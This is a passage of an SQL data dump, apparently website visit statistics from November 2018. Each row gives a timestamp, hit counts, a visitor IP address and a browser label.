,'chrome'),(326317,1541455212,1,1,0,0,'54.36.148.235','other'),(326318,1541455381,1,1,0,0,'54.36.148.249','other'),(326319,1541455541,2,2,0,0,'95.132.61.112','firefox'),(326320,1541455656,3,3,0,0,'216.244.66.241','other'),(326321,1541455831,1,1,0,0,'95.163.255.93','other'),(326322,1541455833,1,1,0,0,'95.163.255.94','other'),(326323,1541455852,1,1,0,0,'54.36.148.16','other'),(326324,1541455937,1,1,0,0,'207.46.13.232','other'),(326325,1541455947,1,1,0,0,'40.77.167.205','other'),(326326,1541455980,1,1,0,0,'54.36.149.44','other'),(326327,1541456304,2,2,0,0,'178.154.244.11','other'),(326328,1541456514,1,1,0,0,'54.36.149.54','other'),(326329,1541456604,1,1,0,0,'216.244.66.241','other'),(326330,1541456879,24,24,0,0,'66.249.66.40','chrome'),(326331,1541456884,7,7,0,0,'66.249.66.42','chrome'),(326332,1541456910,1,1,0,0,'66.249.66.155','chrome'),(326334,1541456975,1,1,0,0,'178.255.215.94','other'),(326335,1541457033,1,1,0,0,'54.36.148.94','other'),(326336,1541457254,1,1,0,0,'54.36.149.103','other'),(326337,1541457261,1,1,0,0,'66.249.66.156','chrome'),(326338,1541457302,1,1,0,0,'66.249.66.157','chrome'),(326339,1541457303,1,1,0,0,'66.249.66.154','chrome'),(326340,1541457370,3,3,0,0,'66.249.66.44','chrome'),(326341,1541457617,1,1,0,0,'54.36.148.28','other'),(326342,1541457649,1,1,0,0,'54.36.148.45','other'),(326343,1541457713,1,1,0,0,'54.36.148.63','other'),(326344,1541458136,2,2,0,0,'207.46.13.252','other'),(326345,1541458140,1,1,0,0,'207.46.13.232','other'),(326346,1541458463,1,1,0,0,'54.36.148.130','other'),(326347,1541458607,1,1,0,0,'54.36.148.189','other'),(326348,1541458722,1,1,0,0,'66.249.66.154','chrome'),(326349,1541458881,1,1,0,0,'157.55.39.197','other'),(326350,1541459019,1,1,0,0,'40.77.167.205','other'),(326351,1541459029,2,2,0,0,'40.77.167.222','other'),(326352,1541459143,2,2,0,0,'66.249.66.156','chrome'),(326353,1541459150,3,3,0,0,'66.249.66.152','chrome'),(326354,1541459192,1,1,0,0,'54.36.148.57','other'),(326355,1541459220,3,3,0,0,'66.249.66.44','chrome'),(326356,1541459229,3,3,0,0,'66.249.66.42','chrome'),(326357,1541459259,12,12,0,0,'66.249.66.40','chrome'),(326358,1541459362,1,1,0,0,'54.36.149.66','other'),(326359,1541459471,2,2,0,0,'66.249.66.155','chrome'),(326360,1541459506,1,1,0,0,'207.46.13.252','other'),(326361,1541459529,3,3,0,0,'173.212.233.72','chrome'),(326362,1541459973,1,1,0,0,'54.36.148.133','other'),(326363,1541460095,1,1,0,0,'46.229.168.150','other'),(326364,1541460096,1,1,0,0,'46.229.168.140','other'),(326365,1541460161,1,1,0,0,'46.229.168.145','other'),(326366,1541460389,1,1,0,0,'54.36.148.240','other'),(326367,1541460493,1,1,0,0,'54.36.149.23','other'),(326368,1541460523,1,1,0,0,'54.36.148.252','other'),(326369,1541460559,1,1,0,0,'40.77.167.205','other'),(326370,1541460564,1,1,0,0,'207.46.13.252','other'),(326371,1541460568,1,1,0,0,'40.77.167.222','other'),(326372,1541460699,1,1,0,0,'54.36.148.251','other'),(326373,1541460925,1,1,0,0,'54.36.148.101','other'),(326374,1541461026,1,1,0,0,'54.36.149.20','other'),(326375,1541461133,1,1,0,0,'54.36.148.225','other'),(326376,1541461403,1,1,0,0,'54.36.149.7','other'),(326377,1541461471,1,1,0,0,'207.46.13.242','other'),(326378,1541461475,2,2,0,0,'207.46.13.252','other'),(326379,1541461629,1,1,0,0,'54.36.148.180','other'),(326380,1541461698,3,3,0,0,'216.244.66.241','other'),(326381,1541461946,1,0,1,0,'66.249.66.152',''),(326382,1541461947,1,1,0,0,'207.46.13.232','other'),(326383,1541462042,2,2,0,0,'66.249.66.156','chrome'),(326384,1541462115,1,1,0,0,'66.249.66.155','chrome'),(326385,1541462121,1,1,0,0,'62.205.134.182','other'),(326386,1541462137,1,1,0,0,'66.249.66.152','chrome'),(326387,1541462168,1,1,0,0,'54.36.148.119','other'),(326388,1541462202,1,1,0,0,'54.36.148.129','other'),(326389,1541462230,1,0,1,0,'66.249.66.42',''),(326390,1541462405,1,1,0,0,'54.36.148.172','other'),(326391,1541462423,1,1,0,0,'54.36.148.104','other'),(326392,1541462490,1,1,0,0,'54.36.148.32','other'),(326393,1541462642,2,2,0,0,'40.77.167.222','other'),(326394,1541462647,1,1,0,0,'207.46.13.242','other'),(326395,1541462652,2,2,0,0,'207.46.13.252','other'),(326396,1541462841,5,5,0,0,'178.154.244.29','other'),(326397,1541462842,1,1,0,0,'54.36.148.134','other'),(326398,1541462918,4,4,0,0,'178.154.244.11','other'),(326399,1541463075,1,1,0,0,'54.36.148.240','other'),(326400,1541463350,7,7,0,0,'216.244.66.241','other'),(326401,1541463570,1,1,0,0,'141.8.142.103','other'),(326402,1541463815,1,1,0,0,'8.29.198.27','other'),(326403,1541464390,2,2,0,0,'207.46.13.242','other'),(326404,1541464394,2,2,0,0,'207.46.13.252','other'),(326405,1541464399,1,1,0,0,'40.77.167.222','other'),(326406,1541464669,1,1,0,0,'54.36.148.224','other'),(326407,1541464892,1,1,0,0,'216.244.66.241','other'),(326408,1541465034,1,1,0,0,'207.46.13.216','other'),(326409,1541465119,1,1,0,0,'54.36.148.239','other'),(326410,1541465310,1,1,0,0,'54.36.148.150','other'),(326411,1541465452,2,2,0,0,'8.29.198.25','other'),(326412,1541465488,1,1,0,0,'54.36.148.250','other'),(326413,1541465572,1,1,0,0,'54.36.148.219','other'),(326414,1541465871,1,1,0,0,'46.229.168.138','other'),(326415,1541466130,1,1,0,0,'54.36.148.102','other'),(326416,1541466149,1,1,0,0,'54.36.148.69','other'),(326417,1541467079,1,1,0,0,'54.36.149.65','other'),(326418,1541468131,1,1,0,0,'54.36.148.113','other'),(326419,1541468462,1,1,0,0,'216.244.66.241','other'),(326420,1541468954,1,1,0,0,'54.36.149.90','other'),(326421,1541468979,1,1,0,0,'54.36.148.27','other'),(326422,1541469106,1,1,0,0,'54.36.148.205','other'),(326423,1541469504,1,1,0,0,'180.76.15.157','other'),(326424,1541469505,1,1,0,0,'180.76.15.23','other'),(326425,1541469603,1,1,0,0,'54.36.148.237','other'),(326426,1541469653,3,3,0,0,'216.244.66.241','other'),(326427,1541470727,1,1,0,0,'54.36.148.170','other'),(326428,1541471120,1,1,0,0,'207.46.13.216','other'),(326429,1541471653,1,1,0,0,'54.36.149.24','other'),(326430,1541471693,4,4,0,0,'216.244.66.241','other'),(326431,1541471896,2,2,0,0,'40.77.167.222','other'),(326432,1541472083,1,1,0,0,'66.249.66.155','chrome'),(326433,1541472086,1,1,0,0,'66.249.66.154','chrome'),(326434,1541472494,1,1,0,0,'54.36.148.154','other'),(326435,1541472663,1,1,0,0,'95.163.255.92','other'),(326436,1541472666,1,1,0,0,'95.163.255.95','other'),(326437,1541472686,1,1,0,0,'54.36.149.93','other'),(326438,1541472693,1,1,0,0,'216.244.66.241','other'),(326439,1541472727,2,2,0,0,'54.36.149.210','other'),(326440,1541472951,7,7,0,0,'178.154.244.29','other'),(326441,1541473119,3,3,0,0,'178.154.244.11','other'),(326442,1541473240,1,1,0,0,'66.249.66.155','chrome'),(326443,1541473247,1,1,0,0,'66.249.66.154','chrome'),(326444,1541473379,1,1,0,0,'207.46.13.252','other'),(326445,1541473535,1,1,0,0,'54.36.148.48','other'),(326446,1541473699,1,1,0,0,'54.36.149.48','other'),(326447,1541473823,1,1,0,0,'54.36.148.220','other'),(326448,1541473858,1,1,0,0,'87.250.224.118','other'),(326449,1541474274,1,1,0,0,'54.36.148.139','other'),(326450,1541474559,1,1,0,0,'54.36.149.46','other'),(326451,1541474616,1,1,0,0,'54.36.148.78','other'),(326452,1541474679,1,1,0,0,'8.29.198.25','other'),(326453,1541474799,1,1,0,0,'207.46.13.252','other'),(326454,1541474839,1,1,0,0,'193.106.30.98','firefox'),(326455,1541475079,1,1,0,0,'54.36.149.97','other'),(326456,1541475103,1,1,0,0,'207.46.13.242','other'),(326457,1541475104,1,1,0,0,'54.36.149.88','other'),(326458,1541475173,2,2,0,0,'216.244.66.241','other'),(326459,1541475274,1,1,0,0,'13.57.233.99','chrome'),(326460,1541475352,2,2,0,0,'40.77.167.222','other'),(326461,1541475562,2,2,0,0,'46.211.20.7','chrome'),(326462,1541475606,2,2,0,0,'91.242.162.21','other'),(326463,1541475787,1,1,0,0,'54.36.148.217','other'),(326464,1541476254,1,1,0,0,'54.36.149.106','other'),(326465,1541476313,1,1,0,0,'8.29.198.26','other'),(326466,1541476396,1,1,0,0,'54.36.148.43','other'),(326467,1541476455,1,1,0,0,'54.36.149.17','other'),(326468,1541476541,1,1,0,0,'95.163.255.92','other'),(326469,1541476544,1,1,0,0,'95.163.255.95','other'),(326470,1541476545,1,1,0,0,'54.36.149.49','other'),(326471,1541476574,1,1,0,0,'8.29.198.27','other'),(326472,1541477192,3,3,0,0,'216.244.66.241','other'),(326473,1541477270,1,1,0,0,'54.36.149.98','other'),(326474,1541477538,1,1,0,0,'54.36.149.81','other'),(326475,1541477860,1,1,0,0,'54.36.148.48','other'),(326476,1541478413,1,1,0,0,'54.36.149.4','other'),(326477,1541478688,1,1,0,0,'207.46.13.117','other'),(326478,1541478721,2,2,0,0,'91.209.11.236','other'),(326479,1541478926,1,1,0,0,'66.249.66.156','chrome'),(326480,1541479028,1,1,0,0,'54.36.148.114','other'),(326481,1541479128,1,1,0,0,'54.36.149.82','other'),(326482,1541479188,1,1,0,0,'66.249.66.40','chrome'),(326483,1541479209,1,1,0,0,'54.36.148.239','other'),(326484,1541479290,4,4,0,0,'216.244.66.241','other'),(326485,1541479392,1,1,0,0,'54.36.148.127','other'),(326486,1541479458,1,1,0,0,'207.46.13.190','other'),(326487,1541479726,1,1,0,0,'54.36.149.52','other'),(326488,1541479744,1,1,0,0,'54.36.148.249','other'),(326489,1541480018,4,4,0,0,'178.154.244.29','other'),(326490,1541480242,1,1,0,0,'54.36.149.65','other'),(326491,1541480278,1,1,0,0,'54.36.149.101','other'),(326492,1541480457,1,1,0,0,'54.36.148.120','other'),(326493,1541480811,1,1,0,0,'54.36.149.47','other'),(326494,1541481121,1,1,0,0,'66.249.66.157','chrome'),(326495,1541481122,1,1,0,0,'66.249.66.156','chrome'),(326496,1541481284,1,1,0,0,'54.36.149.93','other'),(326497,1541481360,1,1,0,0,'66.249.66.154','chrome'),(326498,1541481458,8,8,0,0,'216.244.66.241','other'),(326499,1541481548,1,1,0,0,'54.36.148.223','other'),(326500,1541481572,1,1,0,0,'54.36.149.54','other'),(326501,1541481697,1,1,0,0,'54.36.149.81','other'),(326502,1541482126,1,1,0,0,'207.46.13.117','other'),(326503,1541482483,2,2,0,0,'216.244.66.241','other'),(326504,1541482597,1,1,0,0,'54.36.148.189','other'),(326505,1541482610,2,2,0,0,'46.229.168.137','other'),(326506,1541482626,1,1,0,0,'46.229.168.146','other'),(326507,1541482786,1,1,0,0,'54.36.148.121','other'),(326508,1541483056,1,1,0,0,'54.36.149.79','other'),(326509,1541483110,1,1,0,0,'54.36.148.133','other'),(326510,1541483118,2,2,0,0,'5.45.207.79','other'),(326511,1541483488,1,1,0,0,'54.36.148.202','other'),(326512,1541483798,1,1,0,0,'95.163.255.95','other'),(326513,1541483800,1,1,0,0,'95.163.255.99','other'),(326514,1541483882,1,1,0,0,'207.46.13.252','other'),(326515,1541484135,1,1,0,0,'54.36.149.41','other'),(326516,1541484181,1,1,0,0,'207.46.13.232','other'),(326517,1541484200,1,1,0,0,'46.229.168.154','other'),(326518,1541484202,1,1,0,0,'46.229.168.132','other'),(326519,1541484239,1,1,0,0,'54.36.149.107','other'),(326520,1541484270,1,1,0,0,'54.36.148.115','other'),(326521,1541484337,2,2,0,0,'91.209.11.236','other'),(326522,1541484357,1,1,0,0,'54.36.148.144','other'),(326523,1541484438,3,3,0,0,'207.46.13.97','other'),(326524,1541484442,6,6,0,0,'207.46.13.117','other'),(326525,1541484448,1,1,0,0,'207.46.13.190','other'),(326526,1541484453,1,1,0,0,'157.55.39.197','other'),(326527,1541484454,1,1,0,0,'46.229.168.150','other'),(326528,1541484456,1,1,0,0,'46.229.168.147','other'),(326529,1541484457,1,1,0,0,'54.36.149.42','other'),(326530,1541484959,1,1,0,0,'54.36.149.16','other'),(326531,1541484971,1,1,0,0,'54.36.148.187','other'),(326532,1541484987,1,1,0,0,'54.36.148.171','other'),(326533,1541485082,1,1,0,0,'40.77.167.222','other'),(326534,1541485087,1,1,0,0,'207.46.13.242','other'),(326535,1541485167,1,1,0,0,'54.36.148.154','other'),(326536,1541485387,1,1,0,0,'207.46.13.252','other'),(326537,1541485534,1,1,0,0,'8.29.198.27','other'),(326538,1541485571,1,1,0,0,'91.196.178.133','chrome'),(326539,1541485752,1,1,0,0,'216.244.66.241','other'),(326540,1541486025,2,2,0,0,'130.180.219.85','chrome'),(326541,1541486139,4,4,0,0,'178.154.244.29','other'),(326542,1541486193,2,2,0,0,'178.154.244.11','other'),(326543,1541486271,1,1,0,0,'141.8.183.23','other'),(326544,1541486348,1,1,0,0,'54.36.149.34','other'),(326545,1541486513,1,1,0,0,'54.36.149.60','other'),(326546,1541486835,1,1,0,0,'46.229.168.135','other'),(326547,1541487008,1,1,0,0,'66.249.66.44','chrome'),(326548,1541487159,1,1,0,0,'54.36.148.200','other'),(326549,1541487168,1,1,0,0,'8.29.198.27','other'),(326550,1541487437,1,1,0,0,'8.29.198.25','other'),(326551,1541487489,1,1,0,0,'207.46.13.252','other'),(326552,1541487787,1,1,0,0,'207.46.13.232','other'),(326553,1541487856,1,1,0,0,'54.36.148.65','other'),(326554,1541488002,2,2,0,0,'216.244.66.241','other'),(326555,1541488050,1,1,0,0,'54.36.149.59','other'),(326556,1541488199,1,1,0,0,'46.229.168.134','other'),(326557,1541488201,1,1,0,0,'46.229.168.135','other'),(326558,1541488256,2,2,0,0,'92.112.12.60','chrome'),(326559,1541488693,1,1,0,0,'40.77.167.222','other'),(326560,1541488698,1,1,0,0,'207.46.13.242','other'),(326561,1541488909,1,1,0,0,'54.36.149.92','other'),(326562,1541488961,1,1,0,0,'54.36.148.11','other'),(326563,1541489190,1,1,0,0,'66.249.66.61','chrome'),(326565,1541489787,3,3,0,0,'91.196.178.93','chrome'),(326566,1541489917,1,1,0,0,'46.174.125.28','chrome'),(326567,1541490138,3,3,0,0,'91.196.179.33','chrome'),(326568,1541490151,1,1,0,0,'66.249.66.154','chrome'),(326569,1541490209,1,1,0,0,'54.36.148.55','other'),(326570,1541490275,1,1,0,0,'207.46.13.97','other'),(326571,1541490542,1,1,0,0,'54.36.149.66','other'),(326572,1541490733,1,1,0,0,'54.36.148.134','other'),(326573,1541491015,1,1,0,0,'216.244.66.241','other'),(326574,1541491061,2,2,0,0,'66.249.66.156','chrome'),(326575,1541491092,1,1,0,0,'54.36.148.133','other'),(326576,1541491120,1,1,0,0,'54.36.149.4','other'),(326577,1541491223,1,1,0,0,'130.180.219.85','chrome'),(326578,1541491405,1,1,0,0,'178.154.244.29','other'),(326579,1541491420,1,1,0,0,'54.36.148.83','other'),(326580,1541491469,4,4,0,0,'91.196.178.93','chrome'),(326581,1541491529,1,1,0,0,'54.36.148.172','other'),(326582,1541491534,2,2,0,0,'34.216.207.53','chrome'),(326583,1541492099,1,1,0,0,'31.13.115.11','other'),(326584,1541492104,1,1,0,0,'31.13.115.8','other'),(326585,1541492115,1,1,0,0,'31.13.115.6','other'),(326586,1541492221,2,2,0,0,'93.74.166.100','firefox'),(326587,1541492312,2,2,0,0,'54.36.148.224','other'),(326588,1541492326,1,1,0,0,'37.73.160.39','chrome'),(326589,1541492491,1,1,0,0,'91.196.179.33','chrome'),(326590,1541492570,2,2,0,0,'91.196.178.93','chrome'),(326591,1541492691,1,1,0,0,'54.36.148.223','other'),(326592,1541492733,1,1,0,0,'54.36.148.188','other'),(326593,1541492734,1,1,0,0,'91.196.178.169','chrome'),(326594,1541492909,1,1,0,0,'54.36.148.39','other'),(326595,1541492989,3,3,0,0,'91.196.178.186','chrome'),(326596,1541493043,1,1,0,0,'77.111.247.152','chrome'),(326597,1541493385,3,3,0,0,'91.196.178.167','chrome'),(326598,1541494004,1,1,0,0,'95.132.35.40','chrome'),(326599,1541494089,1,1,0,0,'54.36.148.105','other'),(326600,1541494142,2,2,0,0,'95.213.141.126','opera'),(326601,1541494291,1,1,0,0,'46.229.168.146','other'),(326602,1541494382,1,1,0,0,'46.201.112.157','chrome'),(326603,1541494606,1,1,0,0,'37.190.161.80','chrome'),(326604,1541494782,1,1,0,0,'46.229.168.130','other'),(326605,1541494908,1,1,0,0,'54.36.149.77','other'),(326606,1541494971,1,1,0,0,'54.36.148.243','other'),(326607,1541495360,1,1,0,0,'54.36.148.138','other'),(326608,1541495366,1,1,0,0,'54.36.149.37','other'),(326609,1541495541,1,1,0,0,'54.36.149.59','other'),(326610,1541495797,1,1,0,0,'54.36.148.40','other'),(326611,1541496196,1,1,0,0,'46.211.47.231','chrome'),(326612,1541496353,1,1,0,0,'216.244.66.241','other'),(326613,1541496383,1,1,0,0,'8.29.198.26','other'),(326614,1541496710,1,1,0,0,'54.36.149.3','other'),(326615,1541496880,1,1,0,0,'54.36.148.167','other'),(326616,1541497026,1,1,0,0,'54.36.148.101','other'),(326617,1541497172,1,1,0,0,'54.36.148.149','other'),(326618,1541497546,1,1,0,0,'66.249.66.152','chrome'),(326619,1541497791,2,2,0,0,'91.196.178.70','firefox'),(326620,1541497854,1,1,0,0,'54.36.148.65','other'),(326622,1541497883,1,1,0,0,'66.249.66.154','chrome'),(326623,1541498013,1,1,0,0,'8.29.198.26','other'),(326624,1541498301,1,1,0,0,'8.29.198.27','other'),(326625,1541498373,1,1,0,0,'54.36.149.0','other'),(326626,1541498778,1,1,0,0,'54.36.148.51','other'),(326627,1541498936,1,1,0,0,'216.244.66.241','other'),(326628,1541499357,1,1,0,0,'54.36.148.139','other'),(326629,1541499485,1,1,0,0,'54.36.148.155','other'),(326630,1541499638,1,1,0,0,'54.36.148.103','other'),(326631,1541499725,3,3,0,0,'91.196.178.93','chrome'),(326632,1541499748,1,1,0,0,'54.36.148.255','other'),(326633,1541500130,1,1,0,0,'66.249.66.152','other'),(326634,1541500254,1,1,0,0,'54.36.148.106','other'),(326635,1541500779,1,1,0,0,'54.36.148.207','other'),(326636,1541500806,1,1,0,0,'54.36.149.61','other'),(326637,1541500820,1,1,0,0,'54.36.149.90','other'),(326638,1541500890,1,1,0,0,'54.36.148.31','other'),(326639,1541500927,1,1,0,0,'54.36.148.122','other'),(326640,1541501158,1,1,0,0,'54.36.148.149','other'),(326641,1541501188,1,1,0,0,'54.36.148.192','other'),(326642,1541501190,3,3,0,0,'216.244.66.241','other'),(326643,1541501202,1,1,0,0,'54.36.149.68','other'),(326644,1541501279,1,1,0,0,'207.46.13.97','other'),(326645,1541501556,2,2,0,0,'46.211.107.9','chrome'),(326646,1541501568,2,2,0,0,'91.196.177.176','chrome'),(326647,1541501658,1,1,0,0,'46.211.148.9','chrome'),(326648,1541501852,1,1,0,0,'77.111.247.152','chrome'),(326649,1541501861,1,1,0,0,'54.36.148.64','other'),(326650,1541502009,1,1,0,0,'178.154.244.11','other'),(326651,1541502207,1,1,0,0,'178.154.244.29','other'),(326652,1541502368,5,5,0,0,'91.196.178.167','firefox'),(326653,1541502542,1,1,0,0,'54.36.148.204','other'),(326654,1541502587,1,1,0,0,'207.46.13.252','other'),(326655,1541502592,1,1,0,0,'207.46.13.232','other'),(326656,1541502749,1,1,0,0,'54.36.148.179','other'),(326657,1541502776,2,2,0,0,'95.132.61.112','firefox'),(326658,1541502908,1,1,0,0,'66.249.66.152','chrome'),(326659,1541503041,1,1,0,0,'216.244.66.241','other'),(326660,1541503972,1,1,0,0,'54.36.148.206','other'),(326661,1541504127,1,1,0,0,'54.36.149.24','other'),(326662,1541504173,1,1,0,0,'216.244.66.241','other'),(326663,1541504270,1,1,0,0,'54.36.148.147','other'),(326664,1541504330,1,1,0,0,'46.211.117.69','chrome'),(326665,1541504369,2,2,0,0,'178.93.37.195','chrome'),(326666,1541504574,1,1,0,0,'54.36.148.138','other'),(326667,1541504669,1,1,0,0,'54.36.148.143','other'),(326668,1541504680,2,2,0,0,'54.36.148.196','other'),(326669,1541504806,1,1,0,0,'54.36.149.99','other'),(326670,1541505100,1,1,0,0,'54.36.149.76','other'),(326671,1541505129,1,1,0,0,'107.21.1.8','other'),(326672,1541505131,1,1,0,0,'54.208.102.37','other'),(326673,1541505993,3,3,0,0,'54.36.148.169','other'),(326674,1541506160,3,3,0,0,'216.244.66.241','other'),(326675,1541506468,1,1,0,0,'54.36.148.162','other'),(326676,1541506748,1,1,0,0,'66.102.9.134','chrome'),(326677,1541506749,1,1,0,0,'66.102.9.156','chrome'),(326678,1541506821,1,1,0,0,'54.36.149.58','other'),(326679,1541506926,2,2,0,0,'91.196.177.165','chrome'),(326680,1541507101,1,1,0,0,'92.112.201.114','chrome'),(326681,1541507237,1,1,0,0,'8.29.198.27','other'),(326682,1541507372,1,1,0,0,'46.229.168.137','other'),(326683,1541507438,1,1,0,0,'54.36.148.248','other'),(326684,1541507559,1,1,0,0,'54.36.148.177','other'),(326685,1541507608,1,1,0,0,'207.46.13.252','other'),(326686,1541507612,1,1,0,0,'207.46.13.232','other'),(326687,1541507726,1,1,0,0,'95.163.255.108','other'),(326688,1541507729,1,1,0,0,'95.163.255.116','other'),(326689,1541507799,1,1,0,0,'54.36.148.176','other'),(326690,1541507838,1,1,0,0,'54.36.148.157','other'),(326691,1541507909,1,1,0,0,'40.77.167.222','other'),(326692,1541508158,1,1,0,0,'54.36.149.23','other'),(326693,1541508188,1,1,0,0,'54.36.148.17','other'),(326694,1541508344,1,1,0,0,'54.36.148.120','other'),(326695,1541508361,2,2,0,0,'178.154.244.29','other'),(326696,1541508636,1,1,0,0,'66.249.66.152','chrome'),(326697,1541508795,1,1,0,0,'216.244.66.241','other'),(326698,1541508873,1,1,0,0,'8.29.198.27','other'),(326699,1541509004,1,1,0,0,'54.36.149.64','other'),(326700,1541509074,2,2,0,0,'91.196.178.131','firefox'),(326701,1541509162,1,1,0,0,'8.29.198.26','other'),(326702,1541509573,1,1,0,0,'54.36.149.1','other'),(326703,1541509908,1,1,0,0,'54.36.149.0','other'),(326704,1541509983,1,1,0,0,'54.165.59.7','other'),(326705,1541510094,1,1,0,0,'66.249.66.156','chrome'),(326706,1541510190,1,1,0,0,'54.36.148.65','other'),(326707,1541510267,1,1,0,0,'54.36.149.90','other'),(326708,1541510442,2,2,0,0,'40.77.167.222','other'),(326709,1541510447,2,2,0,0,'207.46.13.242','other'),(326710,1541510550,1,1,0,0,'54.36.148.132','other'),(326711,1541510632,1,1,0,0,'54.36.148.255','other'),(326712,1541510848,1,1,0,0,'157.55.13.64','other'),(326713,1541510897,1,1,0,0,'79.142.197.254','chrome'),(326714,1541511027,1,1,0,0,'54.36.149.104','other'),(326715,1541511097,1,1,0,0,'95.132.0.203','firefox'),(326716,1541511233,3,3,0,0,'216.244.66.241','other'),(326717,1541511656,1,1,0,0,'54.36.148.96','other'),(326718,1541511960,1,1,0,0,'94.153.228.86','chrome'),(326719,1541512108,3,3,0,0,'91.196.178.93','chrome'),(326720,1541512275,1,1,0,0,'91.196.178.60','chrome'),(326721,1541512299,1,1,0,0,'157.55.39.197','other'),(326722,1541512333,1,1,0,0,'54.36.148.79','other'),(326723,1541512353,1,1,0,0,'54.36.148.249','other'),(326724,1541513128,1,1,0,0,'91.196.178.93','chrome'),(326725,1541513211,1,1,0,0,'216.244.66.241','other'),(326726,1541513217,1,1,0,0,'54.36.148.65','other'),(326727,1541513364,4,4,0,0,'91.196.178.169','chrome'),(326728,1541513529,1,1,0,0,'54.36.148.58','other'),(326729,1541513819,2,2,0,0,'91.196.178.66','firefox'),(326730,1541513928,2,2,0,0,'91.196.178.71','firefox'),(326731,1541513938,1,1,0,0,'54.36.149.2','other'),(326732,1541514133,4,4,0,0,'178.154.244.29','other'),(326733,1541514176,3,3,0,0,'216.244.66.241','other'),(326734,1541514246,2,2,0,0,'91.196.178.93','chrome'),(326735,1541514376,1,1,0,0,'46.229.168.140','other'),(326736,1541514566,1,1,0,0,'178.154.244.11','other'),(326737,1541514613,1,1,0,0,'192.186.134.70','firefox'),(326738,1541516337,4,4,0,0,'216.244.66.241','other'),(326739,1541516403,2,2,0,0,'95.132.36.252','firefox'),(326740,1541516723,1,1,0,0,'54.165.59.7','other'),(326741,1541517266,2,2,0,0,'95.216.19.117','other'),(326742,1541517447,1,1,0,0,'91.196.178.133','chrome'),(326743,1541517494,1,1,0,0,'54.36.148.156','other'),(326744,1541517884,1,1,0,0,'54.36.148.168','other'),(326745,1541517911,1,1,0,0,'54.36.148.102','other'),(326746,1541517925,2,2,0,0,'91.196.178.93','chrome'),(326747,1541517945,1,1,0,0,'207.46.13.117','other'),(326748,1541517946,1,1,0,0,'54.36.148.177','other'),(326749,1541518104,1,1,0,0,'8.29.198.27','other'),(326750,1541518198,1,1,0,0,'91.196.178.131','chrome'),(326751,1541518315,1,1,0,0,'54.36.148.213','other'),(326752,1541518439,1,1,0,0,'54.36.148.180','other'),(326753,1541518500,2,2,0,0,'216.244.66.241','other'),(326754,1541518969,3,3,0,0,'91.196.178.186','chrome'),(326755,1541519058,1,1,0,0,'66.249.66.152','chrome'),(326756,1541519211,1,1,0,0,'91.196.178.133','chrome'),(326757,1541519519,1,1,0,0,'54.36.148.62','other'),(326758,1541519736,1,1,0,0,'8.29.198.26','other'),(326759,1541520068,1,1,0,0,'8.29.198.27','other'),(326760,1541520390,1,1,0,0,'54.36.148.57','other'),(326761,1541520801,1,1,0,0,'54.36.148.149','other'),(326762,1541520954,1,1,0,0,'157.55.39.197','other'),(326763,1541521119,1,1,0,0,'54.36.148.102','other'),(326764,1541521120,1,1,0,0,'54.36.148.214','other'),(326765,1541521437,1,1,0,0,'54.36.149.48','other'),(326766,1541521520,1,1,0,0,'54.36.149.27','other'),(326767,1541521673,2,2,0,0,'216.244.66.241','other'),(326768,1541521874,1,1,0,0,'54.36.148.211','other'),(326769,1541521911,3,3,0,0,'46.211.108.196','chrome'),(326770,1541521924,1,1,0,0,'66.249.66.154','chrome'),(326771,1541522282,6,6,0,0,'178.154.244.29','other'),(326772,1541522648,1,1,0,0,'54.36.148.23','other'),(326773,1541522814,1,1,0,0,'178.150.134.163','firefox'),(326774,1541522887,1,1,0,0,'54.36.148.28','other'),(326775,1541522915,1,1,0,0,'5.45.207.19','other'),(326776,1541523067,4,4,0,0,'216.244.66.241','other'),(326777,1541523275,3,3,0,0,'178.154.244.29','other'),(326778,1541523279,2,2,0,0,'178.154.244.11','other'),(326779,1541523370,1,1,0,0,'66.249.66.61','chrome'),(326780,1541523379,1,1,0,0,'66.249.66.42','chrome'),(326781,1541523395,1,1,0,0,'54.36.148.245','other'),(326782,1541524027,1,1,0,0,'54.36.149.43','other'),(326783,1541524056,1,1,0,0,'54.36.148.112','other'),(326784,1541524211,1,1,0,0,'66.249.66.152','chrome'),(326785,1541524686,1,1,0,0,'54.165.59.7','other'),(326786,1541525024,1,1,0,0,'54.36.149.53','other'),(326787,1541525079,1,1,0,0,'100.24.2.116','firefox'),(326788,1541525116,1,1,0,0,'130.180.212.236','other'),(326789,1541525407,1,1,0,0,'78.111.185.80','chrome'),(326790,1541525459,1,1,0,0,'91.196.178.135','chrome'),(326791,1541525523,1,1,0,0,'46.211.125.96','chrome'),(326792,1541525535,1,1,0,0,'46.211.125.96','other'),(326793,1541525718,1,1,0,0,'92.113.191.98','chrome'),(326794,1541525752,1,1,0,0,'91.196.178.104','chrome'),(326795,1541525955,1,1,0,0,'54.36.148.159','other'),(326796,1541526092,1,1,0,0,'54.36.148.96','other'),(326797,1541526276,1,1,0,0,'54.36.149.67','other'),(326798,1541526279,1,1,0,0,'54.36.148.133','other'),(326799,1541526382,1,1,0,0,'54.165.59.7','other'),(326800,1541526408,1,1,0,0,'54.36.149.26','other'),(326801,1541526723,1,1,0,0,'54.36.149.95','other'),(326802,1541526729,2,2,0,0,'207.46.13.190','other'),(326803,1541526739,1,1,0,0,'216.244.66.241','other'),(326804,1541526760,1,1,0,0,'173.252.87.1','other'),(326805,1541526774,1,1,0,0,'54.36.148.95','other'),(326806,1541526786,1,1,0,0,'54.36.148.41','other'),(326807,1541526948,1,1,0,0,'193.106.30.98','firefox'),(326808,1541527102,1,1,0,0,'67.231.16.205','other'),(326809,1541527235,1,1,0,0,'95.134.184.117','chrome'),(326810,1541527433,1,1,0,0,'173.252.87.10','other'),(326811,1541527555,1,1,0,0,'54.36.148.92','other'),(326812,1541527785,1,1,0,0,'54.36.148.172','other'),(326813,1541527848,1,1,0,0,'93.72.116.202','chrome'),(326814,1541528688,1,1,0,0,'46.229.168.141','other'),(326815,1541528935,1,1,0,0,'54.36.148.243','other'),(326816,1541528959,1,1,0,0,'8.29.198.25','other'),(326817,1541528996,3,3,0,0,'178.154.244.11','other'),(326818,1541529125,2,2,0,0,'178.154.244.29','other'),(326819,1541529216,1,1,0,0,'54.36.148.247','other'),(326820,1541529416,3,3,0,0,'216.244.66.241','other'),(326821,1541529492,1,1,0,0,'77.111.244.29','chrome'),(326822,1541529498,1,1,0,0,'92.112.125.188','chrome'),(326823,1541529545,1,1,0,0,'54.36.148.175','other'),(326824,1541529575,1,1,0,0,'54.36.148.76','other'),(326825,1541529821,1,1,0,0,'91.196.178.162','chrome'),(326826,1541530031,1,1,0,0,'91.124.119.243','chrome'),(326827,1541530205,1,1,0,0,'5.9.98.178','other'),(326828,1541530271,2,2,0,0,'207.46.13.190','other'),(326829,1541530